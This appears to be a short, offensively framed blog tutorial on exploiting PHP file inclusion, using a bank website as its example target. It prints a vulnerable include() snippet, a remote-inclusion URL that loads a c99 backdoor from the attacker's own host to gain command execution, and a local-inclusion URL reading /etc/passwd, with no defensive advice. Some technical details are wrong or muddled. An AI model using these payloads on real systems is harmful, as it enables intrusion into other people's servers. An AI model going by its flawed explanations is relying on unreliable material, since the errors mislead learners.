How to exploit File Inclusion vulnerability

0
 File inclusion is also dangerous vulnerability. In any server site scripting language this vulnerable may appear but Most of time it appear in PHP script for some bogus code such as include, require_once  etc.

There two type File inclusion Vulnerability Remote File and  Local File Inclusion.

Remote File Inclusion Vulnerability:

Perhaps you heard about RFI=Remote File Inclusion which is really dangerous. If there are any RFI vulnerability exists then an attack(Hacker) may load some malicious scripts(Just think about IFRAME).

Suppose my target is :

www.bank.com/index.php?fool=developer

So somewhere in the “*.php” some kind of code like :

$fool = $_GET[‘fool’];
include( $fool . ‘.php’ );

So “include” will actually load > developer.php . But we can browse the site another malicious way because we are hacker. Suppose we hosted a c99.php backdoor in our own website(www.mysite.com/c99.php).  And now time to exploit like :

www.bank.com/index.php?fool=http://www.mysite.com/c99.php . If the target website load this page then  we can run command, Upload file etc.

Local File Inclusion:

LFI= Local File Inclusion same as RFI but it will load the local file of the target server.

For example :

www.bank.com/lfi.php?include=/etc/passwd

But Now my favorite linux does not allow you to write file or read /etc/shadow file with sudo/su power. But of course we can read other file such as mysql, error_file, writing some temp file etc.

Easy to understand?